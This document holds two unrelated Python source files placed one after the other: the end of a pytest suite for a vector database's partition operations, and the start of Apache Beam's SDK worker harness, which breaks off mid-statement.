self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="skip temporarily for debug")
def test_partition_maximum_partitions(self):
"""
target: verify create maximum partitions
method: 1. create maximum partitions
2. create one more partition
expected: raise exception
"""
threads_num = 8
threads = []
def create_partition(collection, threads_n):
for _ in range(ct.max_partition_num // threads_n):
name = cf.gen_unique_str(prefix)
par_wrap = ApiPartitionWrapper()
par_wrap.init_partition(collection, name, check_task=CheckTasks.check_nothing)
collection_w = self.init_collection_wrap()
for _ in range(threads_num):
t = threading.Thread(target=create_partition, args=(collection_w.collection, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
p_name = cf.gen_unique_str()
self.partition_wrap.init_partition(
collection_w.collection, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "maximum partition's number should be limit to 4096"})
# TODO: Try to verify load collection with a large number of partitions. #11651
@pytest.mark.tags(CaseLabel.L0)
def test_partition_drop_default_partition(self):
"""
target: verify drop the _default partition
method: drop the _default partition
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
default_partition, _ = collection_w.partition(ct.default_partition_name)
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert default_partition.name == partition_w.name
# verify that drop partition with error
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "default partition cannot be deleted"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_drop_partition_twice(self):
"""
target: verify drop the same partition twice
method: 1.create a partition with default schema
2. drop the partition
3. drop the same partition again
expected: raise exception for 2nd time
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
# verify that drop the partition again with exception
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: PartitionErrorMessage.PartitionNotExist})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_create_and_drop_multi_times(self):
"""
target: verify create and drop a partition multiple times
method: 1. create a partition with default schema
2. drop the partition
3. loop #1 and #2 for 5 times
expected: create and drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# range for 5 times
partition_name = cf.gen_unique_str(prefix)
for i in range(5):
# create partition and check that the partition exists
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop partition and check that the partition not exists
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_partition_drop_non_empty_partition(self):
"""
target: verify drop a partition which has data inserted
method: 1. create a partition with default schema
2. insert some data
3. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data())
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("data", [cf.gen_default_list_data(nb=3000)])
@pytest.mark.parametrize("index_param", cf.gen_simple_index())
def test_partition_drop_indexed_partition(self, data, index_param):
"""
target: verify drop an indexed partition
method: 1. create a partition
2. insert some data
3. create an index
4. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
ins_res, _ = partition_w.insert(data)
assert len(ins_res.primary_keys) == len(data[0])
# create index of collection
collection_w.create_index(ct.default_float_vec_field_name, index_param)
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_release_empty_partition(self):
"""
target: verify release an empty partition
method: 1. create a partition
2. release the partition
expected: release successfully
"""
# create partition
partition_w = self.init_partition_wrap()
assert partition_w.is_empty
# release partition
partition_w.release()
# TODO: assert no more memory consumed
@pytest.mark.tags(CaseLabel.L2)
def test_partition_release_dropped_partition(self):
"""
target: verify release a dropped partition
method: 1. create a partition
2. drop the partition
3. release the partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# release the dropped partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: PartitionErrorMessage.PartitionNotExist})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_release_dropped_collection(self):
"""
target: verify release a dropped collection
method: 1. create a collection and partition
2. drop the collection
3. release the partition
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# release the partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_after_collection_released(self):
"""
target: verify release a partition after the collection released
method: 1. create a collection and partition
2. insert some data
3. release the collection
4. release the partition
expected: partition released successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
data = cf.gen_default_list_data()
partition_w.insert(data)
assert partition_w.num_entities == len(data[0])
assert collection_w.num_entities == len(data[0])
# load partition
partition_w.load()
# search of partition
search_vectors = cf.gen_vectors(1, ct.default_dim)
res_1, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res_1) == 1
# release collection
collection_w.release()
# search of partition
res_2, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 0,
ct.err_msg: "not loaded into memory"})
# release partition
partition_w.release()
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_default_partition(self):
"""
target: verify insert data into _default partition
method: 1. create a collection
2. insert some data into _default partition
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
partition_name = ct.default_partition_name
assert collection_w.has_partition(partition_name)[0]
partition_w = self.init_partition_wrap(collection_w, partition_name)
# insert data to partition
data = cf.gen_default_dataframe_data()
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == len(data)
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_dropped_partition(self):
"""
target: verify insert data into a dropped partition
method: 1. create a collection
2. insert some data into a dropped partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition not exist"})
# TODO: update the assert error
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_dropped_collection(self):
"""
target: verify insert data into a dropped collection
method: 1. create a collection
2. insert some data into a dropped collection
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "None Type"})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_insert_maximum_size_data(self):
"""
target: verify insert maximum size data (256M?) at a time
method: 1. create a partition
2. insert maximum size data
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w)
# insert data to partition
max_size = 100000 # TODO: clarify the max size of data
ins_res, _ = partition_w.insert(cf.gen_default_dataframe_data(max_size), timeout=40)
assert len(ins_res.primary_keys) == max_size
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == max_size
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("dim", [ct.default_dim - 1, ct.default_dim + 1])
def test_partition_insert_mismatched_dimensions(self, dim):
"""
target: verify insert data with mismatched dimensions
method: 1. create a collection with default dim
2. insert data with a mismatched dim
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
data = cf.gen_default_list_data(nb=10, dim=dim)
# insert data to partition
partition_w.insert(data, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "but entities field dim"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("sync", [True, False])
def test_partition_insert_sync(self, sync):
"""
target: verify insert sync
method: 1. create a partition
2. insert data in sync
expected: insert successfully
"""
pass
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("data", [cf.gen_default_list_data(nb=3000)])
@pytest.mark.parametrize("index_param", cf.gen_simple_index())
def test_partition_delete_indexed_data(self, data, index_param):
"""
target: verify delete entities with an expression condition from an indexed partition
method: 1. create collection
2. create an index
3. create a partition
4. insert some data
5. delete entities with an expression condition
expected: delete successfully
issue #15456
"""
# create collection
collection_w = self.init_collection_wrap()
# create index of collection
collection_w.create_index(ct.default_float_vec_field_name, index_param)
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
ins_res, _ = partition_w.insert(data)
assert len(ins_res.primary_keys) == len(data[0])
# delete entities with an expression condition
expr = "int64 in [0,1]"
res = partition_w.delete(expr)
assert len(res) == 2
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_repeat(self):
"""
target: test creating the same partition repeatedly, check status returned
method: create a partition with the same name twice
expected: status is ok
"""
# create partition
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
partition_e = self.init_partition_wrap(collection_w, partition_w.name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_name_none(self):
"""
target: test create partition with partition name set to None, check status returned
method: call function: create_partition
expected: status ok
"""
collection_w = self.init_collection_wrap()
partition_name = None
partition_w = self.init_partition_wrap(collection_w, partition_name)
class TestShowBase(TestcaseBase):
"""
******************************************************************
The following cases are used to test list partition
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions(self):
"""
target: test show partitions, check status and partitions returned
method: create partition first, then call : collection.partitions
expected: status ok, partition correct
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.partitions[1].name == partition_w.name
@pytest.mark.tags(CaseLabel.L0)
def test_show_multi_partitions(self):
"""
target: test show partitions, check status and partitions returned
method: create partitions first, then call : collection.partitions
expected: status ok, partitions correct
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
partition_e = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.partitions[1].name == partition_w.name
assert collection_w.partitions[1].name == partition_e.name
class TestHasBase(TestcaseBase):
"""
******************************************************************
The following cases are used to test `has_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_a(self):
"""
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_w.name)[0]
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_multi_partitions(self):
"""
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w1 = self.init_partition_wrap(collection_w, partition_name)
partition_w2 = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_w1.name)[0]
assert collection_w.has_partition(partition_w2.name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition_name_not_existed(self):
"""
target: test has_partition, check status and result
method: call function has_partition with a partition name that does not exist
expected: status ok, result false
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition_collection_not_existed(self):
"""
target: test has_partition, check status and result
method: call has_partition on a different collection in which the partition was not created
expected: status ok, result false
"""
collection_w = self.init_collection_wrap()
collection_e = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w1 = self.init_partition_wrap(collection_w, partition_name)
assert not collection_e.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition_with_invalid_partition_name(self):
"""
target: test has partition, with invalid partition name, check status returned
method: call function: has_partition
expected: raise exception
"""
collection_w = self.init_collection_wrap()
partition_name = ct.get_invalid_strs
collection_w.has_partition(partition_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"})
class TestDropBase(TestcaseBase):
"""
******************************************************************
The following cases are used to test `drop_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_repeatedly(self):
"""
target: test drop partition twice, check status and whether the partition still exists
method: create a partition first, then call function: drop_partition twice
expected: the second drop fails, and the partition no longer exists in db
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
# drop partition
collection_w.drop_partition(partition_w.name)
# check that the partition not exists
assert not collection_w.has_partition(partition_name)[0]
collection_w.drop_partition(partition_w.name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "Partition not exist"})
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_create(self):
"""
target: test drop partition, and create again, check status
method: create partitions first, then call function: drop_partition, create_partition
expected: status is ok, partition in db
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
collection_w.drop_partition(partition_w.name)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_w.name)
class TestNameInvalid(TestcaseBase):
"""
******************************************************************
The following cases are used to test invalid partition name
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_name(self):
"""
target: test drop partition, with invalid partition name, check status returned
method: call function: drop_partition
expected: status not ok
"""
collection_w = self.init_collection_wrap()
partition_name = ct.get_invalid_strs
collection_w.drop_partition(partition_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"})
|
sdk_worker.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import functools
import logging
import queue
import sys
import threading
import time
import traceback
from builtins import object
from concurrent import futures
from typing import TYPE_CHECKING
from typing import Any
from typing import Callable
from typing import DefaultDict
from typing import Dict
from typing import FrozenSet
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Tuple
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.coders import coder_impl
from apache_beam.metrics import monitoring_infos
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import metrics_pb2
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import statesampler
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.data_plane import PeriodicThread
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
from apache_beam.runners.worker.worker_status import FnApiWorkerStatusHandler
from apache_beam.runners.worker.worker_status import thread_dump
from apache_beam.utils import thread_pool_executor
if TYPE_CHECKING:
from apache_beam.portability.api import endpoints_pb2
from apache_beam.utils.profiler import Profile
_LOGGER = logging.getLogger(__name__)
# This SDK harness will (by default) log a "lull" in processing if it sees no
# transitions in over 5 minutes.
# 5 minutes * 60 seconds * 1000 millis * 1000 micros * 1000 nanoseconds
DEFAULT_LOG_LULL_TIMEOUT_NS = 5 * 60 * 1000 * 1000 * 1000
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S = 60
# Full thread dump is performed at most every 20 minutes.
LOG_LULL_FULL_THREAD_DUMP_INTERVAL_S = 20 * 60
# Full thread dump is performed if the lull is more than 20 minutes.
LOG_LULL_FULL_THREAD_DUMP_LULL_S = 20 * 60
class ShortIdCache(object):
""" Cache for MonitoringInfo "short ids"
"""
def __init__(self):
self._lock = threading.Lock()
self._lastShortId = 0
self._infoKeyToShortId = {} # type: Dict[FrozenSet, str]
self._shortIdToInfo = {} # type: Dict[str, metrics_pb2.MonitoringInfo]
def getShortId(self, monitoring_info):
# type: (metrics_pb2.MonitoringInfo) -> str
""" Returns the assigned shortId for a given MonitoringInfo, assigns one if
not assigned already.
"""
key = monitoring_infos.to_key(monitoring_info)
with self._lock:
try:
return self._infoKeyToShortId[key]
except KeyError:
self._lastShortId += 1
# Convert to a hex string (and drop the '0x') for some compression
shortId = hex(self._lastShortId)[2:]
payload_cleared = metrics_pb2.MonitoringInfo()
payload_cleared.CopyFrom(monitoring_info)
payload_cleared.ClearField('payload')
self._infoKeyToShortId[key] = shortId
self._shortIdToInfo[shortId] = payload_cleared
return shortId
def getInfos(self, short_ids):
# type: (Iterable[str]) -> List[metrics_pb2.MonitoringInfo]
""" Gets the base MonitoringInfo (with payload cleared) for each short ID.
Throws KeyError if an unassigned short ID is encountered.
"""
return [self._shortIdToInfo[short_id] for short_id in short_ids]
SHORT_ID_CACHE = ShortIdCache()
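# A minimal sketch (not part of the original code) of the short-id round trip;
# the MonitoringInfo below is an illustrative assumption.
#
#   info = metrics_pb2.MonitoringInfo(urn='beam:metric:user:sum_int64:v1')
#   short_id = SHORT_ID_CACHE.getShortId(info)  # e.g. '1' (hex, '0x' stripped)
#   SHORT_ID_CACHE.getInfos([short_id])  # -> [info, with its payload cleared]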
class SdkHarness(object):
REQUEST_METHOD_PREFIX = '_request_'
def __init__(self,
control_address, # type: str
credentials=None,
worker_id=None, # type: Optional[str]
# Caching is disabled by default
state_cache_size=0,
# time-based data buffering is disabled by default
data_buffer_time_limit_ms=0,
profiler_factory=None, # type: Optional[Callable[..., Profile]]
status_address=None, # type: Optional[str]
):
self._alive = True
self._worker_index = 0
self._worker_id = worker_id
self._state_cache = StateCache(state_cache_size)
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if credentials is None:
_LOGGER.info('Creating insecure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.insecure_channel(
control_address, options=options)
else:
_LOGGER.info('Creating secure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.secure_channel(
control_address, credentials, options=options)
grpc.channel_ready_future(self._control_channel).result(timeout=60)
_LOGGER.info('Control channel established.')
self._control_channel = grpc.intercept_channel(
self._control_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
credentials, self._worker_id, data_buffer_time_limit_ms)
self._state_handler_factory = GrpcStateHandlerFactory(
self._state_cache, credentials)
self._profiler_factory = profiler_factory
self._fns = KeyedDefaultDict(
lambda id: self._control_stub.GetProcessBundleDescriptor(
beam_fn_api_pb2.GetProcessBundleDescriptorRequest(
process_bundle_descriptor_id=id))
) # type: Mapping[str, beam_fn_api_pb2.ProcessBundleDescriptor]
# BundleProcessor cache across all workers.
self._bundle_processor_cache = BundleProcessorCache(
state_handler_factory=self._state_handler_factory,
data_channel_factory=self._data_channel_factory,
fns=self._fns)
if status_address:
try:
self._status_handler = FnApiWorkerStatusHandler(
status_address, self._bundle_processor_cache
) # type: Optional[FnApiWorkerStatusHandler]
except Exception:
traceback_string = traceback.format_exc()
_LOGGER.warning(
'Error creating worker status request handler, '
'skipping status report. Traceback: %s' % traceback_string)
else:
self._status_handler = None
# TODO(BEAM-8998) use common
# thread_pool_executor.shared_unbounded_instance() to process bundle
# progress once dataflow runner's excessive progress polling is removed.
self._report_progress_executor = futures.ThreadPoolExecutor(max_workers=1)
self._worker_thread_pool = thread_pool_executor.shared_unbounded_instance()
self._responses = queue.Queue(
) # type: queue.Queue[beam_fn_api_pb2.InstructionResponse]
_LOGGER.info('Initializing SDKHarness with unbounded number of workers.')
def run(self):
self._control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(
self._control_channel)
no_more_work = object()
def get_responses():
# type: () -> Iterator[beam_fn_api_pb2.InstructionResponse]
while True:
response = self._responses.get()
if response is no_more_work:
return
yield response
self._alive = True
try:
for work_request in self._control_stub.Control(get_responses()):
_LOGGER.debug('Got work %s', work_request.instruction_id)
request_type = work_request.WhichOneof('request')
# Namespacing the request method with '_request_'. The called method
# will be like self._request_register(request).
getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
work_request)
finally:
self._alive = False
_LOGGER.info('No more requests from control plane')
_LOGGER.info('SDK Harness waiting for in-flight requests to complete')
# Wait until existing requests are processed.
self._worker_thread_pool.shutdown()
# get_responses may be blocked on responses.get(), but we need to return
# control to its caller.
self._responses.put(no_more_work)
# Stop all the workers and clean all the associated resources
self._data_channel_factory.close()
self._state_handler_factory.close()
self._bundle_processor_cache.shutdown()
if self._status_handler:
self._status_handler.close()
_LOGGER.info('Done consuming work.')
def _execute(self,
task, # type: Callable[[], beam_fn_api_pb2.InstructionResponse]
request # type: beam_fn_api_pb2.InstructionRequest
):
# type: (...) -> None
with statesampler.instruction_id(request.instruction_id):
try:
response = task()
except Exception: # pylint: disable=broad-except
traceback_string = traceback.format_exc()
print(traceback_string, file=sys.stderr)
_LOGGER.error(
'Error processing instruction %s. Original traceback is\n%s\n',
request.instruction_id,
traceback_string)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=traceback_string)
self._responses.put(response)
def _request_register(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
# registration request is handled synchronously
self._execute(lambda: self.create_worker().do_instruction(request), request)
def _request_process_bundle(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_execute(request)
def _request_process_bundle_split(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_process_bundle_action(request)
def _request_process_bundle_progress(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_process_bundle_action(request)
def _request_process_bundle_action(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
def task():
instruction_id = getattr(
request, request.WhichOneof('request')).instruction_id
# Only process a progress/split request while the bundle is still being processed.
if (instruction_id in
self._bundle_processor_cache.active_bundle_processors):
self._execute(
lambda: self.create_worker().do_instruction(request), request)
else:
self._execute(
lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
error=('Unknown process bundle instruction {}').format(
instruction_id)),
request)
self._report_progress_executor.submit(task)
def _request_finalize_bundle(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_execute(request)
def _request_execute(self, request):
def task():
self._execute(
lambda: self.create_worker().do_instruction(request), request)
self._worker_thread_pool.submit(task)
_LOGGER.debug(
"Currently using %s threads." % len(self._worker_thread_pool._workers))
def create_worker(self):
return SdkWorker(
self._bundle_processor_cache,
state_cache_metrics_fn=self._state_cache.get_monitoring_infos,
profiler_factory=self._profiler_factory)
class BundleProcessorCache(object):
"""A cache for ``BundleProcessor``s.
``BundleProcessor`` objects are cached by the id of their
``beam_fn_api_pb2.ProcessBundleDescriptor``.
Attributes:
fns (dict): A dictionary that maps bundle descriptor IDs to instances of
``beam_fn_api_pb2.ProcessBundleDescriptor``.
state_handler_factory (``StateHandlerFactory``): Used to create state
handlers to be used by a ``bundle_processor.BundleProcessor`` during
processing.
    data_channel_factory (``data_plane.DataChannelFactory``): Used to create
      data channels for reading and writing data during processing.
    active_bundle_processors (dict): A dictionary, indexed by instruction IDs,
      containing ``bundle_processor.BundleProcessor`` objects that are
      currently processing the corresponding instruction.
    cached_bundle_processors (dict): A dictionary, indexed by bundle descriptor
      id, of cached ``bundle_processor.BundleProcessor`` objects that are not
      currently processing any bundle.
"""
def __init__(self,
state_handler_factory, # type: StateHandlerFactory
data_channel_factory, # type: data_plane.DataChannelFactory
fns # type: Mapping[str, beam_fn_api_pb2.ProcessBundleDescriptor]
):
self.fns = fns
self.state_handler_factory = state_handler_factory
self.data_channel_factory = data_channel_factory
self.active_bundle_processors = {
} # type: Dict[str, Tuple[str, bundle_processor.BundleProcessor]]
self.cached_bundle_processors = collections.defaultdict(
list) # type: DefaultDict[str, List[bundle_processor.BundleProcessor]]
self.last_access_times = collections.defaultdict(
float) # type: DefaultDict[str, float]
self._schedule_periodic_shutdown()
def register(self, bundle_descriptor):
# type: (beam_fn_api_pb2.ProcessBundleDescriptor) -> None
"""Register a ``beam_fn_api_pb2.ProcessBundleDescriptor`` by its id."""
self.fns[bundle_descriptor.id] = bundle_descriptor
def get(self, instruction_id, bundle_descriptor_id):
# type: (str, str) -> bundle_processor.BundleProcessor
"""
Return the requested ``BundleProcessor``, creating it if necessary.
Moves the ``BundleProcessor`` from the inactive to the active cache.
"""
try:
# pop() is threadsafe
processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
except IndexError:
processor = bundle_processor.BundleProcessor(
self.fns[bundle_descriptor_id],
self.state_handler_factory.create_state_handler(
self.fns[bundle_descriptor_id].state_api_service_descriptor),
self.data_channel_factory)
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
return processor
def lookup(self, instruction_id):
# type: (str) -> Optional[bundle_processor.BundleProcessor]
"""
Return the requested ``BundleProcessor`` from the cache.
"""
return self.active_bundle_processors.get(instruction_id, (None, None))[-1]
def discard(self, instruction_id):
# type: (str) -> None
"""
Remove the ``BundleProcessor`` from the cache.
"""
self.active_bundle_processors[instruction_id][1].shutdown()
del self.active_bundle_processors[instruction_id]
def release(self, instruction_id):
# type: (str) -> None
"""
Release the requested ``BundleProcessor``.
Resets the ``BundleProcessor`` and moves it from the active to the
inactive cache.
"""
descriptor_id, processor = self.active_bundle_processors.pop(instruction_id)
processor.reset()
self.last_access_times[descriptor_id] = time.time()
self.cached_bundle_processors[descriptor_id].append(processor)
def shutdown(self):
"""
Shutdown all ``BundleProcessor``s in the cache.
"""
if self.periodic_shutdown:
self.periodic_shutdown.cancel()
self.periodic_shutdown.join()
self.periodic_shutdown = None
    # Iterate over a snapshot, since entries are deleted as we go.
    for instruction_id in list(self.active_bundle_processors):
self.active_bundle_processors[instruction_id][1].shutdown()
del self.active_bundle_processors[instruction_id]
for cached_bundle_processors in self.cached_bundle_processors.values():
BundleProcessorCache._shutdown_cached_bundle_processors(
cached_bundle_processors)
def _schedule_periodic_shutdown(self):
def shutdown_inactive_bundle_processors():
for descriptor_id, last_access_time in self.last_access_times.items():
if (time.time() - last_access_time >
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S):
BundleProcessorCache._shutdown_cached_bundle_processors(
self.cached_bundle_processors[descriptor_id])
self.periodic_shutdown = PeriodicThread(
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S,
shutdown_inactive_bundle_processors)
self.periodic_shutdown.daemon = True
self.periodic_shutdown.start()
@staticmethod
def _shutdown_cached_bundle_processors(cached_bundle_processors):
try:
while True:
# pop() is threadsafe
bundle_processor = cached_bundle_processors.pop()
bundle_processor.shutdown()
except IndexError:
pass
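# A minimal sketch (never called) of the lifecycle the cache above is built
# around; `cache`, `descriptor` and `instruction_id` are hypothetical values
# used purely for illustration.
def _example_bundle_processor_cache_lifecycle(cache, descriptor, instruction_id):
  # Make the descriptor known to the cache, then check a processor out of the
  # inactive pool (or create one) for this instruction.
  cache.register(descriptor)
  processor = cache.get(instruction_id, descriptor.id)
  try:
    # ... process the bundle with `processor` here ...
    # On success the processor is reset and parked in the inactive pool so a
    # later bundle with the same descriptor can reuse it.
    cache.release(instruction_id)
  except Exception:
    # A processor that failed mid-bundle is never reused.
    cache.discard(instruction_id)
    raise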
class SdkWorker(object):
def __init__(self,
bundle_processor_cache, # type: BundleProcessorCache
state_cache_metrics_fn=list,
profiler_factory=None, # type: Optional[Callable[..., Profile]]
log_lull_timeout_ns=None,
):
self.bundle_processor_cache = bundle_processor_cache
self.state_cache_metrics_fn = state_cache_metrics_fn
self.profiler_factory = profiler_factory
self.log_lull_timeout_ns = (
log_lull_timeout_ns or DEFAULT_LOG_LULL_TIMEOUT_NS)
self._last_full_thread_dump_secs = 0
def do_instruction(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> beam_fn_api_pb2.InstructionResponse
request_type = request.WhichOneof('request')
if request_type:
      # E.g. if register is set, this will call self.register(request.register)
return getattr(self, request_type)(
